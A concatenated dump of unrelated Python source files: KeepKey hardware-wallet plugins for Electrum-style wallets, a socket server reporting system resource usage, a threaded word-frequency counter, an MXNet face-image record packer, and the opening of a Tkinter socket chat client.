outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures, signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)
signatures = [bh2u(x) for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.get_keepkey_input_script_type(txin['type'])
else:
def f(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.get_keepkey_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
keepkey_script_type = self.get_keepkey_output_script_type(script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=keepkey_script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=keepkey_script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = validate_op_return_output_and_get_data(o, max_pushes=1)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address.to_full_string(Address.FMT_CASHADDR, net=networks.MainNet)
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m, script_type = info
on_change_branch = index[0] == 1
                # prioritise hiding outputs on the 'change' branch from the user
                # because no more than one change address is allowed
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
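# Signing flow above, in brief: get_client() pairs the device, tx_inputs() and
# tx_outputs() translate the Electrum transaction into KeepKey protobuf types,
# client.sign_tx() returns the signatures, and tx.update_signatures() writes
# them back into the transaction.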
|
server.py
|
from socket import *
import threading
from hardware import Hardware
from storage import Storage
from physicalMemory import PhysicalMemory
from swap import Swap
from datetime import datetime
import subprocess
#initialize objects
h = Hardware()
m = PhysicalMemory()
s = Swap()
st = Storage()
logAccess = {}
def analyze(byteMessage):
message = byteMessage.decode('utf-8')
if 'hard' in message:
return analyzeHardware(message).encode('utf-8')
elif 'mem' in message:
return analyzePhysicalMemory(message).encode('utf-8')
elif 'swap' in message:
return analyzeSwap(message).encode('utf-8')
elif 'stor' in message:
        return analyzeStorage(message).encode('utf-8')
elif 'netstat' in message:
return checkConnection()
elif 'log' in message:
return log().encode('utf-8')
else:
unspecified = 'unspecified request'
return unspecified.encode('utf-8')
def analyzeHardware(message):
if message == 'hardware --arch':
return h.getArchitecture()
elif message == 'hardware --mod':
return h.getModelName()
elif message == 'hardware --cache':
return h.getCache()
elif message == 'hardware':
return h.getArchitecture() + '\n' + h.getModelName() + '\n' + h.getCache()
    else:
        return 'unspecified request'  # analyze() handles the encoding
def analyzePhysicalMemory(message):
if message == 'mem --total':
return m.getTotalMemory()
elif message == 'mem --free':
return m.getFreeMemory()
elif message == 'mem --avail':
return m.getAvailableMemory()
elif message == 'mem':
return m.getTotalMemory() + '\n' + m.getFreeMemory() + '\n' + m.getAvailableMemory()
    else:
        return 'unspecified request'  # analyze() handles the encoding
def analyzeSwap(message):
if message == 'swap --total':
return s.getTotalSwap()
elif message == 'swap --free':
return s.getFreeSwap()
elif message == 'swap --avail':
return s.getAvailableSwap()
elif message == 'swap':
return s.getTotalSwap() + '\n' + s.getFreeSwap() + '\n' + s.getAvailableSwap()
    else:
        return 'unspecified request'  # analyze() handles the encoding
def analyzeStorage(message):
if message == 'stor --total':
return st.getTotalStorage()
elif message == 'stor --avail':
return st.getAvailableStorage()
elif message == 'stor --used':
return st.getUsedStorage()
elif message == 'stor':
return st.getAll()
    else:
        return 'unspecified request'  # analyze() handles the encoding
def checkConnection():
return subprocess.check_output("ping -c1 google.com && echo \"*****INTERNET ONLINE*****\" || echo \"*****INTERNET OFFLINE*****\"", shell=True)
def log():
return str(logAccess)
def usage():
return('USAGE:\n\n\
hardware -> return hardware usage info\n\
--arch architecture of the hardware\n\
--mod model info like Intel or AMD with core and clock\n\
--cache cache info of the computer')
serverPort = 12001
serverSocket = socket(AF_INET,SOCK_STREAM)
serverSocket.bind(('',serverPort))
print('The server is ready to receive')
serverSocket.listen(1)
lock = threading.Lock()
def handleClient(socketConnection, address, timeOfConnect):
    # use the per-client socket passed in, not the module-level one,
    # so concurrent clients do not interfere with each other
    while 1:
        sentence = socketConnection.recv(1024)
        if sentence.decode('utf-8') == 'close':
            lock.acquire()
            logAccess['START: ' + str(timeOfConnect)] = 'END: ' + str(datetime.now())
            lock.release()
            socketConnection.close()
            break
        else:
            response = analyze(sentence)
            socketConnection.send(response)
try:
while 1:
connectionSocket, addr = serverSocket.accept()
lock.acquire()
logAccess['START: '+ str(datetime.now())] = ''
lock.release()
threading.Thread(target = handleClient,args = (connectionSocket,addr, datetime.now())).start()
except Exception as e:
print(e)
connectionSocket.close()
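# A minimal client sketch for the text protocol served above: connect, send a
# command such as 'mem --free' or 'stor', read the reply, then send 'close'.
# The loopback address below is an assumption (client on the same machine).
#
#     from socket import socket, AF_INET, SOCK_STREAM
#     c = socket(AF_INET, SOCK_STREAM)
#     c.connect(('127.0.0.1', 12001))
#     c.send('mem --free'.encode('utf-8'))
#     print(c.recv(1024).decode('utf-8'))
#     c.send('close'.encode('utf-8'))
#     c.close()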
|
tf-16.py
|
import re, sys, operator, Queue, threading
# Two data spaces
word_space = Queue.Queue()
freq_space = Queue.Queue()
stopwords = set(open('../stop_words.txt').read().split(','))
# Worker function that consumes words from the word space
# and sends partial results to the frequency space
def process_words():
word_freqs = {}
while True:
try:
word = word_space.get(timeout=1)
except Queue.Empty:
break
if not word in stopwords:
if word in word_freqs:
word_freqs[word] += 1
else:
word_freqs[word] = 1
freq_space.put(word_freqs)
# Let's create the workers and launch them at their jobs
workers = []
for i in range(5):
workers.append(threading.Thread(target = process_words))
[t.start() for t in workers]
# Let's have this thread populate the word space
for word in re.findall('[a-z]{2,}', open(sys.argv[1]).read().lower()):
word_space.put(word)
# Let's wait for the workers to finish
[t.join() for t in workers]
# Let's merge the partial frequency results by consuming
# frequency data from the frequency space
word_freqs = {}
while not freq_space.empty():
freqs = freq_space.get()
for (k, v) in freqs.iteritems():
if k in word_freqs:
count = sum(item[k] for item in [freqs, word_freqs])
else:
count = freqs[k]
word_freqs[k] = count
for (w, c) in sorted(word_freqs.iteritems(), key=operator.itemgetter(1), reverse=True)[:25]:
print w, '-', c
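# Example invocation (note this script is Python 2: print statement, Queue
# module, dict.iteritems); the input file name is whatever text you want to
# analyse, and ../stop_words.txt must exist as the script expects:
#
#     python tf-16.py input.txt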
|
plugin.py
|
from binascii import hexlify, unhexlify
from electrum.util import bfh, bh2u
from electrum.bitcoin import (b58_address_to_hash160, xpub_from_pubkey,
TYPE_ADDRESS, TYPE_SCRIPT,
is_segwit_address)
from electrum import constants
from electrum.i18n import _
from electrum.plugins import BasePlugin
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKeyCompatibleKeyStore(Hardware_KeyStore):
def get_derivation(self):
return self.derivation
def is_segwit(self):
return self.derivation.startswith("m/49'/")
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyCompatiblePlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
if self.libraries_available:
self.device_manager().register_devices(self.DEVICE_IDS)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at", device.path, str(e))
return None
def _try_bridge(self, device):
self.print_error("Trying to connect over Trezor Bridge...")
try:
return self.bridge_transport({'path': hexlify(device.path)})
except BaseException as e:
self.print_error("cannot connect to bridge", str(e))
return None
def create_client(self, device, handler):
        # disable the bridge because it seems to never return when a KeepKey is plugged in
#transport = self._try_bridge(device) or self._try_hid(device)
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Bitcoin Gold"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target = self._initialize_device, args=(settings, method, device_id, wizard, handler))
            t.daemon = True
t.start()
wizard.loop.exec_()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
wizard.loop.exit(0)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in ('standard',):
raise ScriptTypeNotSupported(_('This type of script is not supported with KeepKey.'))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True, keystore.is_segwit())
outputs = self.tx_outputs(keystore.get_derivation(), tx, keystore.is_segwit())
signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
raw = bh2u(signed_tx)
tx.update_signatures(raw)
def show_address(self, wallet, address):
client = self.get_client(wallet.keystore)
if not client.atleast_version(1, 3):
wallet.keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = wallet.keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
segwit = wallet.keystore.is_segwit()
script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDADDRESS
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
def tx_inputs(self, tx, for_sig=False, segwit=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
                prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDADDRESS
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = map(f, x_pubkeys)
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDMULTISIG
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if 'scriptSig' in txin:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx, segwit=False):
def create_output_by_derivation(info):
index, xpubs, m = info
if len(xpubs) == 1:
script_type = self.types.PAYTOP2SHWITNESS if segwit else self.types.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
script_type = self.types.PAYTOP2SHWITNESS if segwit else self.types.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d" % index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
if is_segwit_address(address):
txoutputtype.script_type = self.types.PAYTOWITNESS
else:
addrtype, hash_160 = b58_address_to_hash160(address)
if addrtype == constants.net.ADDRTYPE_P2PKH:
txoutputtype.script_type = self.types.PAYTOADDRESS
elif addrtype == constants.net.ADDRTYPE_P2SH:
txoutputtype.script_type = self.types.PAYTOSCRIPTHASH
else:
raise Exception('addrtype: ' + str(addrtype))
txoutputtype.address = address
return txoutputtype
def is_any_output_on_change_branch():
for _type, address, amount in tx.outputs():
info = tx.output_info.get(address)
if info is not None:
index, xpubs, m = info
if index[0] == 1:
return True
return False
outputs = []
has_change = False
any_output_on_change_branch = is_any_output_on_change_branch()
for _type, address, amount in tx.outputs():
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info
on_change_branch = index[0] == 1
                # prioritise hiding outputs on the 'change' branch from the user
                # because no more than one change address is allowed
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation(info)
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
face2rec2.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# Usage: python3 face2rec2.py /path/to/your/train.lst --num-thread 8
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
import sys
#curr_path = os.path.abspath(os.path.dirname(__file__))
#sys.path.append(os.path.join(curr_path, "../python"))
import mxnet as mx
import random
import argparse
import cv2
import time
import traceback
#from builtins import range
from easydict import EasyDict as edict
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'common'))
import face_preprocess
import face_image
try:
import multiprocessing
except ImportError:
multiprocessing = None
def read_list(path_in):
with open(path_in) as fin:
identities = []
last = [-1, -1]
_id = 1
while True:
line = fin.readline()
if not line:
break
item = edict()
item.flag = 0
item.image_path, label, item.bbox, item.landmark, item.aligned = face_preprocess.parse_lst_line(line)
if not item.aligned and item.landmark is None:
#print('ignore line', line)
continue
item.id = _id
item.label = [label, item.aligned]
yield item
if label!=last[0]:
if last[1]>=0:
identities.append( (last[1], _id) )
last[0] = label
last[1] = _id
_id+=1
identities.append( (last[1], _id) )
item = edict()
item.flag = 2
item.id = 0
item.label = [float(_id), float(_id+len(identities))]
yield item
for identity in identities:
item = edict()
item.flag = 2
item.id = _id
_id+=1
item.label = [float(identity[0]), float(identity[1])]
yield item
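# Note on read_list(): records with flag == 0 are ordinary image entries, while
# the trailing flag == 2 records carry identity ranges (start/end record ids),
# which is the layout the downstream training code appears to expect; this
# reading is inferred from the code above.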
def image_encode(args, i, item, q_out):
oitem = [item.id]
#print('flag', item.flag)
if item.flag==0:
fullpath = item.image_path
header = mx.recordio.IRHeader(item.flag, item.label, item.id, 0)
#print('write', item.flag, item.id, item.label)
if item.aligned:
with open(fullpath, 'rb') as fin:
img = fin.read()
s = mx.recordio.pack(header, img)
q_out.put((i, s, oitem))
else:
img = cv2.imread(fullpath, args.color)
assert item.landmark is not None
img = face_preprocess.preprocess(img, bbox = item.bbox, landmark=item.landmark, image_size='%d,%d'%(args.image_h, args.image_w))
s = mx.recordio.pack_img(header, img, quality=args.quality, img_fmt=args.encoding)
q_out.put((i, s, oitem))
else:
header = mx.recordio.IRHeader(item.flag, item.label, item.id, 0)
#print('write', item.flag, item.id, item.label)
s = mx.recordio.pack(header, b'')
q_out.put((i, s, oitem))
def read_worker(args, q_in, q_out):
while True:
deq = q_in.get()
if deq is None:
break
i, item = deq
image_encode(args, i, item, q_out)
def write_worker(q_out, fname, working_dir):
pre_time = time.time()
count = 0
fname = os.path.basename(fname)
fname_rec = os.path.splitext(fname)[0] + '.rec'
fname_idx = os.path.splitext(fname)[0] + '.idx'
record = mx.recordio.MXIndexedRecordIO(os.path.join(working_dir, fname_idx),
os.path.join(working_dir, fname_rec), 'w')
buf = {}
more = True
while more:
deq = q_out.get()
if deq is not None:
i, s, item = deq
buf[i] = (s, item)
else:
more = False
while count in buf:
s, item = buf[count]
del buf[count]
if s is not None:
#print('write idx', item[0])
record.write_idx(item[0], s)
if count % 1000 == 0:
cur_time = time.time()
print('time:', cur_time - pre_time, ' count:', count)
pre_time = cur_time
count += 1
def parse_args():
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description='Create an image list or \
make a record database by reading from an image list')
parser.add_argument('prefix', help='prefix of input/output lst and rec files.')
#parser.add_argument('root', help='path to folder containing images.')
cgroup = parser.add_argument_group('Options for creating image lists')
cgroup.add_argument('--list', type=bool, default=False,
help='If this is set im2rec will create image list(s) by traversing root folder\
and output to <prefix>.lst.\
Otherwise im2rec will read <prefix>.lst and create a database at <prefix>.rec')
cgroup.add_argument('--exts', nargs='+', default=['.jpeg', '.jpg'],
help='list of acceptable image extensions.')
cgroup.add_argument('--chunks', type=int, default=1, help='number of chunks.')
cgroup.add_argument('--train-ratio', type=float, default=1.0,
help='Ratio of images to use for training.')
cgroup.add_argument('--test-ratio', type=float, default=0,
help='Ratio of images to use for testing.')
cgroup.add_argument('--recursive', type=bool, default=False,
help='If true recursively walk through subdirs and assign an unique label\
to images in each folder. Otherwise only include images in the root folder\
and give them label 0.')
cgroup.add_argument('--shuffle', type=bool, default=True, help='If this is set as True, \
im2rec will randomize the image order in <prefix>.lst')
rgroup = parser.add_argument_group('Options for creating database')
rgroup.add_argument('--quality', type=int, default=95,
help='JPEG quality for encoding, 1-100; or PNG compression for encoding, 1-9')
rgroup.add_argument('--num-thread', type=int, default=1,
help='number of thread to use for encoding. order of images will be different\
from the input list if >1. the input list will be modified to match the\
resulting order.')
rgroup.add_argument('--color', type=int, default=1, choices=[-1, 0, 1],
help='specify the color mode of the loaded image.\
1: Loads a color image. Any transparency of image will be neglected. It is the default flag.\
0: Loads image in grayscale mode.\
-1:Loads image as such including alpha channel.')
rgroup.add_argument('--encoding', type=str, default='.jpg', choices=['.jpg', '.png'],
help='specify the encoding of the images.')
rgroup.add_argument('--pack-label', type=bool, default=False,
help='Whether to also pack multi dimensional label in the record file')
args = parser.parse_args()
args.prefix = os.path.abspath(args.prefix)
#args.root = os.path.abspath(args.root)
return args
if __name__ == '__main__':
args = parse_args()
if args.list:
pass
#make_list(args)
else:
if os.path.isdir(args.prefix):
working_dir = args.prefix
else:
working_dir = os.path.dirname(args.prefix)
prop = face_image.load_property(working_dir)
image_size = prop.image_size
print('image_size', image_size)
args.image_h = image_size[0]
args.image_w = image_size[1]
files = [os.path.join(working_dir, fname) for fname in os.listdir(working_dir)
if os.path.isfile(os.path.join(working_dir, fname))]
count = 0
for fname in files:
if fname.startswith(args.prefix) and fname.endswith('.lst'):
print('Creating .rec file from', fname, 'in', working_dir)
count += 1
image_list = read_list(fname)
# -- write_record -- #
if args.num_thread > 1 and multiprocessing is not None:
q_in = [multiprocessing.Queue(1024) for i in range(args.num_thread)]
q_out = multiprocessing.Queue(1024)
read_process = [multiprocessing.Process(target=read_worker, args=(args, q_in[i], q_out)) \
for i in range(args.num_thread)]
for p in read_process:
p.start()
write_process = multiprocessing.Process(target=write_worker, args=(q_out, fname, working_dir))
write_process.start()
for i, item in enumerate(image_list):
q_in[i % len(q_in)].put((i, item))
for q in q_in:
q.put(None)
for p in read_process:
p.join()
q_out.put(None)
write_process.join()
else:
                    print('multiprocessing not available, falling back to single-threaded encoding')
try:
import Queue as queue
except ImportError:
import queue
q_out = queue.Queue()
fname = os.path.basename(fname)
fname_rec = os.path.splitext(fname)[0] + '.rec'
fname_idx = os.path.splitext(fname)[0] + '.idx'
record = mx.recordio.MXIndexedRecordIO(os.path.join(working_dir, fname_idx),
os.path.join(working_dir, fname_rec), 'w')
cnt = 0
pre_time = time.time()
for i, item in enumerate(image_list):
image_encode(args, i, item, q_out)
if q_out.empty():
continue
_, s, item = q_out.get()
#header, _ = mx.recordio.unpack(s)
#print('write header label', header.label)
record.write_idx(item[0], s)
if cnt % 1000 == 0:
cur_time = time.time()
print('time:', cur_time - pre_time, ' count:', cnt)
pre_time = cur_time
cnt += 1
if not count:
            print('Did not find any .lst file with prefix %s' % args.prefix)
|
client.py
|
from socket import *
import threading
from tkinter import *
address = '127.0.0.1'  # server IP address
port=9000
buffsize=1024
s=socket(AF_INET, SOCK_STREAM)
s.connect((address,port))
gui = None  # set by createGUI() once the Tk window exists

def recv():
    while True:
        recvdata = s.recv(buffsize).decode('utf-8')
        # the GUI is built in another thread; skip the listbox until it exists
        if gui is not None:
            gui.listBox.insert(END, recvdata)
        print('\n' + recvdata + '\n')
class GUI:
def __init__(self, root):
self.root = root
self.listBox = Listbox(self.root)
self.listBox.pack()
self.entry = Entry(self.root)
self.entry.pack()
self.sendBtn = Button(self.root, text='SEND', command=self.send)
